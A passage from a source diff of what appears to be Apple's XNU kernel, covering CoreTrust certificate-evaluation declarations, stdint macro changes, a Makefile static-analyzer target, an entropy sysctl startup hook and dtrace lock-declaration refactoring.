+                                const uint8_t *rootKeyData, size_t rootKeyLen,  // Input: Root public key, if not specified production root will be used
+                                const uint8_t **leafKeyData, size_t *leafKeyLen,// Output: points to the leaf key data in the input certsData
+                                CTBAAIdentity *identity);                       // Output from identity field in leaf certificate
+
+int CTEvaluateBAAUser(const uint8_t *certsData, size_t certsLen,        // Input: binary representation of exactly 3 concatenated
+                                                                        //        DER-encoded certs, with leaf first
+                      const uint8_t **leafKeyData, size_t *leafKeyLen,  // Output: points to the leaf key data in the input certsData
+                      CTBAAIdentity *identity);                         // Output from identity field in leaf certificate
+
+int CTEvaluateBAAUserTestRoot(const uint8_t *certsData, size_t certsLen,        // Input: binary representation of exactly 3 concatenated
+                                                                                //        DER-encoded certs, with leaf first
+                              const uint8_t *rootKeyData, size_t rootKeyLen,    // Input: Root public key, if not specified production root will be used
+                              const uint8_t **leafKeyData, size_t *leafKeyLen,  // Output: points to the leaf key data in the input certsData
+                              CTBAAIdentity *identity);                         // Output from identity field in leaf certificate
+
+int CTEvaluateSatori(const uint8_t *certsData, size_t certsLen,         // Input: binary (DER) representation of 3 concatenated certs
+                                                                        //        with leaf first
+                     bool allowTestRoot,                                // Input: whether to allow the Test Apple Roots
+                     const uint8_t **leafKeyData, size_t *leafKeyLen);  // Output: points to the leaf key data in the input certsData
+
+int CTEvaluatePragueSignatureCMS(const uint8_t *cmsData, size_t cmsLen,                 // Input: CMS signature blob
+                                 const uint8_t *detachedData, size_t detachedDataLen,   // Input: data signed by CMS blob
+                                 bool allowTestRoot,                                    // Input: permit use of test hierarchy
+                                 const uint8_t **leafKeyData, size_t *leafKeyLen);      // Output: points to leaf key data in input cmsData
+
+int CTEvaluateKDLSignatureCMS(const uint8_t *cmsData, size_t cmsLen,                    // Input: CMS signature blob
+                              const uint8_t *detachedData, size_t detachedDataLen,      // Input: data signed by CMS blob
+                              bool allowTestRoot,                                       // Input: permit use of test hierarchy
+                              const uint8_t **leafKeyData, size_t *leafKeyLen);         // Output: points to leaf key data in input cmsData
+
+typedef uint64_t CoreTrustPolicyFlags;
+enum {
+    CORETRUST_POLICY_BASIC =                0,
+    CORETRUST_POLICY_SAVAGE_DEV =           1 << 0,
+    CORETRUST_POLICY_SAVAGE_PROD =          1 << 1,
+    CORETRUST_POLICY_MFI_AUTHV3 =           1 << 2,
+    CORETRUST_POLICY_MAC_PLATFORM =         1 << 3,
+    CORETRUST_POLICY_MAC_DEVELOPER =        1 << 4,
+    CORETRUST_POLICY_DEVELOPER_ID =         1 << 5,
+    CORETRUST_POLICY_MAC_APP_STORE =        1 << 6,
+    CORETRUST_POLICY_IPHONE_DEVELOPER =     1 << 7,
+    CORETRUST_POLICY_IPHONE_APP_PROD =      1 << 8,
+    CORETRUST_POLICY_IPHONE_APP_DEV =       1 << 9,
+    CORETRUST_POLICY_IPHONE_VPN_PROD =      1 << 10,
+    CORETRUST_POLICY_IPHONE_VPN_DEV =       1 << 11,
+    CORETRUST_POLICY_TVOS_APP_PROD =        1 << 12,
+    CORETRUST_POLICY_TVOS_APP_DEV =         1 << 13,
+    CORETRUST_POLICY_TEST_FLIGHT_PROD =     1 << 14,
+    CORETRUST_POLICY_TEST_FLIGHT_DEV =      1 << 15,
+    CORETRUST_POLICY_IPHONE_DISTRIBUTION =  1 << 16,
+    CORETRUST_POLICY_MAC_SUBMISSION =       1 << 17,
+    CORETRUST_POLICY_YONKERS_DEV =          1 << 18,
+    CORETRUST_POLICY_YONKERS_PROD =         1 << 19,
+    CORETRUST_POLICY_MAC_PLATFORM_G2 =      1 << 20,
+    CORETRUST_POLICY_ACRT =                 1 << 21,
+    CORETRUST_POLICY_SATORI =               1 << 22,
+    CORETRUST_POLICY_BAA =                  1 << 23,
+    CORETRUST_POLICY_UCRT =                 1 << 24,
+    CORETRUST_POLICY_PRAGUE =               1 << 25,
+    CORETRUST_POLICY_KDL =                  1 << 26,
+    CORETRUST_POLICY_MFI_AUTHV2 =           1 << 27,
+    CORETRUST_POLICY_MFI_SW_AUTH_PROD =     1 << 28,
+    CORETRUST_POLICY_MFI_SW_AUTH_DEV =      1 << 29,
+    CORETRUST_POLICY_COMPONENT =            1 << 30,
+    CORETRUST_POLICY_IMG4 =                 1ULL << 31,
+    CORETRUST_POLICY_SERVER_AUTH =          1ULL << 32,
+    CORETRUST_POLICY_SERVER_AUTH_STRING =   1ULL << 33,
+};
+
+typedef uint32_t CoreTrustDigestType;
+enum {
+    CORETRUST_DIGEST_TYPE_SHA1 = 1,
+    CORETRUST_DIGEST_TYPE_SHA224 = 2,
+    CORETRUST_DIGEST_TYPE_SHA256 = 4,
+    CORETRUST_DIGEST_TYPE_SHA384 = 8,
+    CORETRUST_DIGEST_TYPE_SHA512 = 16
+};
+
+int CTEvaluateAMFICodeSignatureCMS(const uint8_t *cmsData, size_t cmsLen,                   // Input: CMS blob
+                                   const uint8_t *detachedData, size_t detachedDataLen,     // Input: data signed by CMS blob
+                                   bool allow_test_hierarchy,                               // Input: permit use of test hierarchy
+                                   const uint8_t **leafCert, size_t *leafCertLen,           // Output: signing certificate
+                                   CoreTrustPolicyFlags *policyFlags,                       // Output: policy met by signing certificate
+                                   CoreTrustDigestType *cmsDigestType,                      // Output: digest used to sign the CMS blob
+                                   CoreTrustDigestType *hashAgilityDigestType,              // Output: highest stregth digest type
+                                                                                            //          from hash agility attribute
+                                   const uint8_t **digestData, size_t *digestLen);          // Output: pointer to hash agility value
+                                                                                            //          in CMS blob (with digest type above)
+/* Returns non-zero if there's a standards-based problem with the CMS or certificates.
+ * Policy matching of the certificates is only reflected in the policyFlags output. Namely, if the only problem is that
+ * the certificates don't match a policy, the returned integer will be 0 (success) and the policyFlags will be 0 (no matching policies).
+ * Some notes about hash agility outputs:
+ *  - hashAgilityDigestType is only non-zero for HashAgilityV2
+ *  - If hashAgilityDigestType is non-zero, digestData/Len provides the digest value
+ *  - If hashAgilityDigestType is zero, digestData/Len provides the content of the HashAgilityV1 attribute (if present)
+ *  - If neither HashAgilityV1 nor HashAgilityV2 attributes are found, these outputs will all be NULL.
+ */
+
+int CTParseAccessoryCerts(const uint8_t *certsData, size_t certsLen,                    // Input: CMS or binary representation of DER-encoded certs
+                                  const uint8_t **leafCertData, size_t *leafCertLen,    // Output: points to leaf cert data in input certsData
+                                  const uint8_t **subCACertData, size_t *subCACertLen,  // Output: points to subCA cert data (1st of 2) in input certsData, if present. Is set to NULL if only one cert present in input.
+                                  CoreTrustPolicyFlags *flags);                         // Output: policy flags set by this leaf
+
+
+int CTEvaluateAccessoryCert(const uint8_t *leafCertData, size_t leafCertLen,            // Input: binary representation of DER-encoded leaf cert
+                            const uint8_t *subCACertData, size_t subCACertLen,          // Input: (optional) binary representation of DER-encoded subCA cert
+                            const uint8_t *anchorCertData, size_t anchorCertLen,        // Input: binary representation of DER-encoded anchor cert
+                            CoreTrustPolicyFlags policy,                                // Input: policy to use when evaluating chain
+                            const uint8_t **leafKeyData, size_t *leafKeyLen,            // Output: points to the leaf key data in the input leafCertData
+                            const uint8_t **extensionValueData, size_t *extensionValueLen); // Output: points to the extension value in the input leafCertData
+/* Which extension value is returned is based on which policy the cert was verified against:
+ *  - For MFI AuthV3, this is the value of the extension with OID 1.2.840.113635.100.6.36
+ *  - For SW Auth, this is the value of the extension with OID 1.2.840.113635.100.6.59.1 (GeneralCapabilities extension)
+ *  - For Component certs, this si the value of the extension with OID 1.2.840.113635.100.11.1 (Component Type)
+ *
+ * The following CoreTrustPolicyFlags are accepted:
+ *  - CORETRUST_POLICY_BASIC
+ *  - CORETRUST_POLICY_MFI_AUTHV2
+ *  - CORETRUST_POLICY_MFI_AUTHV3
+ *  - CORETRUST_POLICY_MFI_SW_AUTH_DEV
+ *  - CORETRUST_POLICY_MFI_SW_AUTH_PROD
+ *  - CORETRUST_POLICY_COMPONENT
+ */
+
+int CTEvaluateAppleSSL(const uint8_t *certsData, size_t certsLen,           // Input: binary representation of up to 3 concatenated
+                                                                            //        DER-encoded certificates, with leaf first
+                       const uint8_t *hostnameData, size_t hostnameLen,     // Input: The hostname of the TLS server being connected to
+                       uint64_t leafMarker,                                 // Input: The last decimal of the marker OID for this project
+                                                                            //        (e.g. 32 for 1.2.840.113635.100.6.27.32
+                       bool allowTestRoots);                                // Input: permit use of test hierarchy
+
+int CTEvaluateAppleSSLWithOptionalTemporalCheck(const uint8_t *certsData, size_t certsLen,
+                                                 const uint8_t *hostnameData, size_t hostnameLen,
+                                                 uint64_t leafMarker,
+                                                 bool allowTestRoots,
+                                                 bool checkTemporalValidity);
+
+__END_DECLS
+
+#endif /* _CORETRUST_EVALUATE_H_ */
index 9d86e8a623bf4f35fffe2affa629f02013b06f89..19ac69fb0f4cc70b58c01630269fecb2d2c3708e 100644 (file)
@@ -60,12 +60,51 @@ typedef uint64_t        uint_fast64_t;
 
 
 /* 7.18.1.5 Greatest-width integer types */
-typedef long long                intmax_t;
-typedef unsigned long long      uintmax_t;
+#ifdef __INTMAX_TYPE__
+typedef __INTMAX_TYPE__ intmax_t;
+#else
+#ifdef __LP64__
+typedef long int intmax_t;
+#else
+typedef long long int intmax_t;
+#endif /* __LP64__ */
+#endif /* __INTMAX_TYPE__ */
+#ifdef __UINTMAX_TYPE__
+typedef __UINTMAX_TYPE__ uintmax_t;
+#else
+#ifdef __LP64__
+typedef long unsigned int uintmax_t;
+#else
+typedef long long unsigned int uintmax_t;
+#endif /* __LP64__ */
+#endif /* __UINTMAX_TYPE__ */
+
+/* 7.18.4 Macros for integer constants */
+#define INT8_C(v)    (v)
+#define INT16_C(v)   (v)
+#define INT32_C(v)   (v)
+#define INT64_C(v)   (v ## LL)
+
+#define UINT8_C(v)   (v)
+#define UINT16_C(v)  (v)
+#define UINT32_C(v)  (v ## U)
+#define UINT64_C(v)  (v ## ULL)
+
+#ifdef __LP64__
+#define INTMAX_C(v)  (v ## L)
+#define UINTMAX_C(v) (v ## UL)
+#else
+#define INTMAX_C(v)  (v ## LL)
+#define UINTMAX_C(v) (v ## ULL)
+#endif
 
 /* 7.18.2 Limits of specified-width integer types:
  *   These #defines specify the minimum and maximum limits
  *   of each of the types declared above.
+ *
+ *   They must have "the same type as would an expression that is an
+ *   object of the corresponding type converted according to the integer
+ *   promotion".
  */
 
 
@@ -126,43 +165,33 @@ typedef unsigned long long      uintmax_t;
 /* 7.18.2.4 Limits of integer types capable of holding object pointers */
 
 #if __WORDSIZE == 64
-#define INTPTR_MIN       INT64_MIN
-#define INTPTR_MAX       INT64_MAX
+#define INTPTR_MAX        9223372036854775807L
 #else
-#define INTPTR_MIN        INT32_MIN
-#define INTPTR_MAX        INT32_MAX
+#define INTPTR_MAX        2147483647L
 #endif
+#define INTPTR_MIN        (-INTPTR_MAX-1)
 
 #if __WORDSIZE == 64
-#define UINTPTR_MAX      UINT64_MAX
+#define UINTPTR_MAX       18446744073709551615UL
 #else
-#define UINTPTR_MAX       UINT32_MAX
+#define UINTPTR_MAX       4294967295UL
 #endif
 
 /* 7.18.2.5 Limits of greatest-width integer types */
-#define INTMAX_MIN        INT64_MIN
-#define INTMAX_MAX        INT64_MAX
-
-#define UINTMAX_MAX       UINT64_MAX
+#define INTMAX_MAX        INTMAX_C(9223372036854775807)
+#define UINTMAX_MAX       UINTMAX_C(18446744073709551615)
+#define INTMAX_MIN        (-INTMAX_MAX-1)
 
 /* 7.18.3 "Other" */
 #if __WORDSIZE == 64
-#define PTRDIFF_MIN      INT64_MIN
-#define PTRDIFF_MAX      INT64_MAX
+#define PTRDIFF_MIN      INTMAX_MIN
+#define PTRDIFF_MAX      INTMAX_MAX
 #else
 #define PTRDIFF_MIN       INT32_MIN
 #define PTRDIFF_MAX       INT32_MAX
 #endif
 
-/* We have no sig_atomic_t yet, so no SIG_ATOMIC_{MIN,MAX}.
-   Should end up being {-127,127} or {0,255} ... or bigger.
-   My bet would be on one of {U}INT32_{MIN,MAX}. */
-
-#if __WORDSIZE == 64
-#define SIZE_MAX         UINT64_MAX
-#else
-#define SIZE_MAX          UINT32_MAX
-#endif
+#define SIZE_MAX          UINTPTR_MAX
 
 #if defined(__STDC_WANT_LIB_EXT1__) && __STDC_WANT_LIB_EXT1__ >= 1
 #define RSIZE_MAX         (SIZE_MAX >> 1)
@@ -194,20 +223,6 @@ typedef unsigned long long      uintmax_t;
 #define SIG_ATOMIC_MIN   INT32_MIN
 #define SIG_ATOMIC_MAX   INT32_MAX
 
-/* 7.18.4 Macros for integer constants */
-#define INT8_C(v)    (v)
-#define INT16_C(v)   (v)
-#define INT32_C(v)   (v)
-#define INT64_C(v)   (v ## LL)
-
-#define UINT8_C(v)   (v ## U)
-#define UINT16_C(v)  (v ## U)
-#define UINT32_C(v)  (v ## U)
-#define UINT64_C(v)  (v ## ULL)
-
-#define INTMAX_C(v)  (v ## LL)
-#define UINTMAX_C(v) (v ## ULL)
-
 #endif /* KERNEL */
 
 #endif /* _KERNEL_STDINT_H_ */
index 8b1e30f654286e49c82164e05d236cf4554f3ceb..9b62aadb1fd8ff819fadf2ee3524ba6f166f3c54 100644 (file)
--- a/Makefile
+++ b/Makefile
@@ -318,6 +318,8 @@ xnu_tests_driverkit:
                SRCROOT=$(SRCROOT)/tests/driverkit
 
 
+include $(MakeInc_cmd)
+
 #
 # The "analyze" target defined below invokes Clang Static Analyzer
 # with a predefined set of checks and options for the project.
@@ -339,16 +341,18 @@ STATIC_ANALYZER_TARGET ?=
 STATIC_ANALYZER_EXTRA_FLAGS ?=
 
 analyze:
-       # This is where the reports are going to be available.
-       # Old reports are deleted on make clean only.
-       mkdir -p $(STATIC_ANALYZER_OUTPUT_DIR)
-
-       # Recursively build the requested target under scan-build.
-       # Exclude checks that weren't deemed to be security critical,
-       # like null pointer dereferences.
-       xcrun scan-build -o $(STATIC_ANALYZER_OUTPUT_DIR) \
+# This is where the reports are going to be available.
+# Old reports are deleted on make clean only.
+       $(_v)$(MKDIR) $(STATIC_ANALYZER_OUTPUT_DIR)
+
+# Recursively build the requested target under scan-build.
+# Exclude checks that weren't deemed to be security critical,
+# like null pointer dereferences.
+       $(_v)$(XCRUN) $(SCAN_BUILD) -o $(STATIC_ANALYZER_OUTPUT_DIR) \
                -disable-checker deadcode.DeadStores \
                -disable-checker core.NullDereference \
                -disable-checker core.DivideZero \
                $(STATIC_ANALYZER_EXTRA_FLAGS) \
-               make $(STATIC_ANALYZER_TARGET)
+               $(MAKE) $(STATIC_ANALYZER_TARGET) QUIET=1 2>&1 | $(GREP) "^scan-build:"
+
+.PHONY: analyze
index bd15b00256c2431d0be719b50e40cf1f2ce8f82e..a0d5d3bc3fc01b7d05b162f7534e08a28920e653 100644 (file)
@@ -107,7 +107,7 @@ readFile(const char *path, vm_offset_t * objAddr, vm_size_t * objSize)
 static void
 usage(void)
 {
-       fprintf(stderr, "Usage: %s [-s OLDSEGNAME] -n NEWSEGNAME input -o output\n", getprogname());
+       fprintf(stderr, "Usage: %s [-s OLDSEGNAME] [-i IGNORESEGNAME] -n NEWSEGNAME input -o output\n", getprogname());
        exit(1);
 }
 
@@ -120,6 +120,7 @@ main(int argc, char * argv[])
        const char            * output_name = NULL;
        const char            * input_name = NULL;
        const char            * oldseg_name = NULL;
+       const char            * ignoreseg_name = NULL;
        const char            * newseg_name = NULL;
        struct mach_header    * hdr;
        struct mach_header_64 * hdr64;
@@ -137,11 +138,14 @@ main(int argc, char * argv[])
        int                     ch;
 
 
-       while ((ch = getopt(argc, argv, "s:n:o:")) != -1) {
+       while ((ch = getopt(argc, argv, "s:i:n:o:")) != -1) {
                switch (ch) {
                case 's':
                        oldseg_name = optarg;
                        break;
+               case 'i':
+                       ignoreseg_name = optarg;
+                       break;
                case 'n':
                        newseg_name = optarg;
                        break;
@@ -234,7 +238,8 @@ main(int argc, char * argv[])
                                attr = OSSwapInt32(attr);
                        }
 
-                       if (!(S_ATTR_DEBUG & attr)) {
+                       if (!(S_ATTR_DEBUG & attr) && (!ignoreseg_name ||
+                           0 != strncmp(ignoreseg_name, (char *)names, sizeof(*names)))) {
                                if (!oldseg_name ||
                                    0 == strncmp(oldseg_name, (char *)names, sizeof(*names))) {
                                        memset(names, 0x0, sizeof(*names));
index 085f1396819a9ce78112dbd84bb5b2103ff0292a..ce69fd9cd8738e8f2fb6b4a0e0077e889a6decb0 100644 (file)
@@ -26,7 +26,7 @@
 #ifndef DFLSSIZ
 /* XXX stack size default is a platform property: use getrlimit(2) */
 #if (defined(TARGET_OS_OSX) && (TARGET_OS_OSX != 0)) || \
-        (defined(KERNEL) && !defined(CONFIG_EMBEDDED) || (CONFIG_EMBEDDED == 0))
+        (defined(KERNEL) && XNU_TARGET_OS_OSX)
 #define DFLSSIZ         (8*1024*1024 - 16*1024)
 #else
 #define DFLSSIZ         (1024*1024 - 16*1024)   /* initial stack size limit */
@@ -35,7 +35,7 @@
 #ifndef MAXSSIZ
 /* XXX stack size limit is a platform property: use getrlimit(2) */
 #if (defined(TARGET_OS_OSX) && (TARGET_OS_OSX != 0)) || \
-        (defined(KERNEL) && !defined(CONFIG_EMBEDDED) || (CONFIG_EMBEDDED == 0))
+        (defined(KERNEL) && XNU_TARGET_OS_OSX)
 #define MAXSSIZ         (64*1024*1024)          /* max stack size */
 #else
 #define MAXSSIZ         (1024*1024)             /* max stack size */
index f151c7312ab1a5d179dc273f36f8d0d4c93c2d02..7971787ee73ee672aff35c769718ebf621baad9e 100644 (file)
@@ -167,6 +167,7 @@ bsd/vfs/vfs_conf.c                  standard
 bsd/vfs/vfs_conf.c                     optional config_nfs4
 bsd/vfs/vfs_fslog.c                    standard
 bsd/vfs/vfs_init.c                     standard
+bsd/vfs/vfs_io_compression_stats.c     optional config_io_compression_stats
 bsd/vfs/vfs_lookup.c                   standard
 bsd/vfs/vfs_quota.c                    optional quota
 bsd/vfs/vfs_subr.c                     standard
@@ -457,6 +458,7 @@ bsd/kern/subr_log.c                 standard
 bsd/kern/subr_prf.c                    standard
 bsd/kern/subr_sbuf.c                   standard
 bsd/kern/subr_xxx.c                    standard
+bsd/kern/counter_test.c                        optional development
 bsd/kern/sys_eventlink.c               standard
 bsd/kern/sys_generic.c                 standard
 bsd/kern/sys_pipe.c                    standard
index 2d1197ce747ef90d49c48bec522cacbacd37ebed..2ff49f54b6f7eb4a6cd19cedb738073edc054f31 100644 (file)
@@ -6,9 +6,6 @@ export MakeInc_dir=${SRCROOT}/makedefs/MakeInc.dir
 include $(MakeInc_cmd)
 include $(MakeInc_def)
 
-DATAFILES = \
-       entropy_sysctl.h
-
 INSTALL_MI_LIST =
 
 EXPORT_MI_LIST = ${DATAFILES}
index 39502f7b9fc8c5b610fcbeed83859a64ae3020d6..73580d77b871160f4d7aad45f3643a3ff2a84ce8 100644 (file)
@@ -27,9 +27,9 @@
  */
 
 #include <sys/sysctl.h>
+#include <pexpert/pexpert.h>
 #include <kern/zalloc.h>
 #include <kern/percpu.h>
-#include <crypto/entropy/entropy_sysctl.h>
 #include <prng/entropy.h>
 #include <libkern/section_keywords.h>
 
@@ -49,7 +49,7 @@ SYSCTL_UINT(_kern_entropy_health_adaptive_proportion_test, OID_AUTO, failure_cou
 SYSCTL_UINT(_kern_entropy_health_adaptive_proportion_test, OID_AUTO, max_observation_count, CTLFLAG_RD, &entropy_health_apt_stats.max_observation_count, 0, NULL);
 
 static int
-sysctl_entropy_collect(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req)
+sysctl_entropy_collect SYSCTL_HANDLER_ARGS
 {
        if (!req->oldptr || req->oldlen > entropy_analysis_buffer_size) {
                return EINVAL;
@@ -61,11 +61,21 @@ sysctl_entropy_collect(__unused struct sysctl_oid *oidp, __unused void *arg1, __
 // Get current size of entropy buffer in bytes
 SYSCTL_UINT(_kern_entropy, OID_AUTO, entropy_buffer_size, CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_NOAUTO, &entropy_analysis_buffer_size, 0, NULL);
 // Collect contents from entropy buffer
-SYSCTL_PROC(_kern_entropy, OID_AUTO, entropy_collect, CTLTYPE_OPAQUE | CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_NOAUTO, NULL, 0, sysctl_entropy_collect, "-", NULL);
+SYSCTL_PROC(_kern_entropy, OID_AUTO, entropy_collect,
+    CTLTYPE_OPAQUE | CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_NOAUTO,
+    NULL, 0, sysctl_entropy_collect, "-", NULL);
 
-void
-entropy_analysis_register_sysctls(void)
+__startup_func
+static void
+entropy_analysis_sysctl_startup(void)
 {
-       sysctl_register_oid(&sysctl__kern_entropy_entropy_buffer_size);
-       sysctl_register_oid(&sysctl__kern_entropy_entropy_collect);
+       uint32_t sample_count = 0;
+       if (__improbable(PE_parse_boot_argn("entropy-analysis-sample-count", &sample_count, sizeof(sample_count)))) {
+               sysctl_register_oid_early(&sysctl__kern_entropy_entropy_buffer_size);
+               sysctl_register_oid_early(&sysctl__kern_entropy_entropy_collect);
+       } else if (__improbable(PE_parse_boot_argn("ebsz", &sample_count, sizeof(sample_count)))) {
+               sysctl_register_oid_early(&sysctl__kern_entropy_entropy_buffer_size);
+               sysctl_register_oid_early(&sysctl__kern_entropy_entropy_collect);
+       }
 }
+STARTUP(SYSCTL, STARTUP_RANK_MIDDLE, entropy_analysis_sysctl_startup);
diff --git a/bsd/crypto/entropy/entropy_sysctl.h b/bsd/crypto/entropy/entropy_sysctl.h
deleted file mode 100644 (file)
index 4e957fb..0000000
+++ /dev/null
@@ -1,42 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-
-#ifndef _SYS_CRYPTO_ENTROPY_ENTROPYSYSCTL_H_
-#define _SYS_CRYPTO_ENTROPY_ENTROPYSYSCTL_H_
-
-// This function is used only for test purposes. We collect a large
-// number of entropy samples during boot and analyze them offline.
-//
-// See entropy.c to understand the initialization of this module via
-// boot arg and the collection of the samples.
-//
-// See entropy_sysctl.c to understand the semantics of the sysctl
-// that exposes the samples for analysis.
-void entropy_analysis_register_sysctls(void);
-
-#endif
index c77f08a640aa6caff06f20aa59995be3dd300ad8..0802551bc92a505c41043b332c22e524a19517ee 100644 (file)
@@ -55,9 +55,6 @@ extern struct arm_saved_state *find_kern_regs(thread_t);
 extern dtrace_id_t      dtrace_probeid_error;   /* special ERROR probe */
 typedef arm_saved_state_t savearea_t;
 
-extern lck_attr_t       *dtrace_lck_attr;
-extern lck_grp_t        *dtrace_lck_grp;
-
 int dtrace_arm_condition_true(int condition, int cpsr);
 
 /*
@@ -94,7 +91,7 @@ dtrace_getipl(void)
  * MP coordination
  */
 
-decl_lck_mtx_data(static, dt_xc_lock);
+static LCK_MTX_DECLARE_ATTR(dt_xc_lock, &dtrace_lck_grp, &dtrace_lck_attr);
 static uint32_t dt_xc_sync;
 
 typedef struct xcArg {
@@ -138,16 +135,6 @@ dtrace_xcall(processorid_t cpu, dtrace_xcall_t f, void *arg)
        return;
 }
 
-/*
- * Initialization
- */
-void
-dtrace_isa_init(void)
-{
-       lck_mtx_init(&dt_xc_lock, dtrace_lck_grp, dtrace_lck_attr);
-       return;
-}
-
 /*
  * Runtime and ABI
  */
index af050d7ee4117c61ec8c5e0a8a559fdb5df8153a..fe18d66ccdd2ba2b139b4f15b2adf9683a4fa7ad 100644 (file)
@@ -64,7 +64,7 @@ typedef enum {
 
 /*
  * We start 32 bytes after sp since 4 registers are pushed onto the stack
- * in the userspace syscall handler, and the first 4 stack argumnets are moved
+ * in the userspace syscall handler, and the first 4 stack arguments are moved
  * into registers already
  */
 #define ARG_SP_BYTE_OFFSET                         32
index 7675bb322199acb849de7aafa02ef3cda7625e6a..bf61083c2d98b685f82deeb9244b64abcae5beb9 100644 (file)
 #include <sys/kauth.h>
 #include <sys/ucred.h>
 #include <sys/proc_internal.h>
+#include <sys/sysproto.h>
 #include <sys/user.h>
 #include <kern/task.h>
 #include <kern/thread.h>
 #include <vm/vm_map.h>
 
+
 /*
  * copy a null terminated string from the kernel address space into the user
  * address space. - if the user is denied write access, return EFAULT. - if
@@ -90,3 +92,4 @@ copywithin(void *src, void *dst, size_t count)
        bcopy(src, dst, count);
        return 0;
 }
+
index 494bb7fad4501ca023424c94c9111a5249c90062..39d6988f9a537e08d6cf524ca20042aa2548728e 100644 (file)
@@ -52,9 +52,6 @@ extern struct arm_saved_state *find_kern_regs(thread_t);
 extern dtrace_id_t      dtrace_probeid_error;   /* special ERROR probe */
 typedef arm_saved_state_t savearea_t;
 
-extern lck_attr_t       *dtrace_lck_attr;
-extern lck_grp_t        *dtrace_lck_grp;
-
 #if XNU_MONITOR
 extern void * pmap_stacks_start;
 extern void * pmap_stacks_end;
@@ -99,7 +96,7 @@ dtrace_getipl(void)
  * MP coordination
  */
 
-decl_lck_mtx_data(static, dt_xc_lock);
+static LCK_MTX_DECLARE_ATTR(dt_xc_lock, &dtrace_lck_grp, &dtrace_lck_attr);
 static uint32_t dt_xc_sync;
 
 typedef struct xcArg {
@@ -143,16 +140,6 @@ dtrace_xcall(processorid_t cpu, dtrace_xcall_t f, void *arg)
        return;
 }
 
-/*
- * Initialization
- */
-void
-dtrace_isa_init(void)
-{
-       lck_mtx_init(&dt_xc_lock, dtrace_lck_grp, dtrace_lck_attr);
-       return;
-}
-
 
 /**
  * Register definitions
index 36d4f82234bc71933c0c704158905af3480ba9f5..af303e6f4d603db75536dc1028cd3b4eefc8ff2c 100644 (file)
@@ -309,10 +309,14 @@ static int dtrace_module_unloaded(struct kmod_info *kmod);
  * LCK_MTX_ASSERT(&cpu_lock, LCK_MTX_ASSERT_OWNED);
  *
  */
-static lck_mtx_t       dtrace_lock;            /* probe state lock */
-static lck_mtx_t       dtrace_provider_lock;   /* provider state lock */
-static lck_mtx_t       dtrace_meta_lock;       /* meta-provider state lock */
-static lck_rw_t                dtrace_dof_mode_lock;   /* dof mode lock */
+static LCK_MTX_DECLARE_ATTR(dtrace_lock,
+    &dtrace_lck_grp, &dtrace_lck_attr);                /* probe state lock */
+static LCK_MTX_DECLARE_ATTR(dtrace_provider_lock,
+    &dtrace_lck_grp, &dtrace_lck_attr);        /* provider state lock */
+static LCK_MTX_DECLARE_ATTR(dtrace_meta_lock,
+    &dtrace_lck_grp, &dtrace_lck_attr);        /* meta-provider state lock */
+static LCK_RW_DECLARE_ATTR(dtrace_dof_mode_lock,
+    &dtrace_lck_grp, &dtrace_lck_attr);        /* dof mode lock */
 
 /*
  * DTrace Provider Variables
@@ -426,7 +430,7 @@ int dtrace_helptrace_enabled = 0;
 static dtrace_errhash_t        dtrace_errhash[DTRACE_ERRHASHSZ];
 static const char *dtrace_errlast;
 static kthread_t *dtrace_errthread;
-static lck_mtx_t dtrace_errlock;
+static LCK_MTX_DECLARE_ATTR(dtrace_errlock, &dtrace_lck_grp, &dtrace_lck_attr);
 #endif
 
 /*
@@ -19200,9 +19204,8 @@ static const struct cdevsw dtrace_cdevsw =
        .d_reserved_2 = eno_putc,
 };
 
-lck_attr_t* dtrace_lck_attr;
-lck_grp_attr_t* dtrace_lck_grp_attr;
-lck_grp_t* dtrace_lck_grp;
+LCK_ATTR_DECLARE(dtrace_lck_attr, 0, 0);
+LCK_GRP_DECLARE(dtrace_lck_grp, "dtrace");
 
 static int gMajDevNo;
 
@@ -19277,25 +19280,6 @@ dtrace_init( void )
                        return;
                }
 
-               /*
-                * Create the dtrace lock group and attrs.
-                */
-               dtrace_lck_attr = lck_attr_alloc_init();
-               dtrace_lck_grp_attr= lck_grp_attr_alloc_init();
-               dtrace_lck_grp = lck_grp_alloc_init("dtrace",  dtrace_lck_grp_attr);
-
-               /*
-                * We have to initialize all locks explicitly
-                */
-               lck_mtx_init(&dtrace_lock, dtrace_lck_grp, dtrace_lck_attr);
-               lck_mtx_init(&dtrace_provider_lock, dtrace_lck_grp, dtrace_lck_attr);
-               lck_mtx_init(&dtrace_meta_lock, dtrace_lck_grp, dtrace_lck_attr);
-               lck_mtx_init(&dtrace_procwaitfor_lock, dtrace_lck_grp, dtrace_lck_attr);
-#if DEBUG
-               lck_mtx_init(&dtrace_errlock, dtrace_lck_grp, dtrace_lck_attr);
-#endif
-               lck_rw_init(&dtrace_dof_mode_lock, dtrace_lck_grp, dtrace_lck_attr);
-
                /*
                 * The cpu_core structure consists of per-CPU state available in any context.
                 * On some architectures, this may mean that the page(s) containing the
@@ -19303,9 +19287,6 @@ dtrace_init( void )
                 * is up to the platform to assure that this is performed properly.  Note that
                 * the structure is sized to avoid false sharing.
                 */
-               lck_mtx_init(&cpu_lock, dtrace_lck_grp, dtrace_lck_attr);
-               lck_mtx_init(&cyc_lock, dtrace_lck_grp, dtrace_lck_attr);
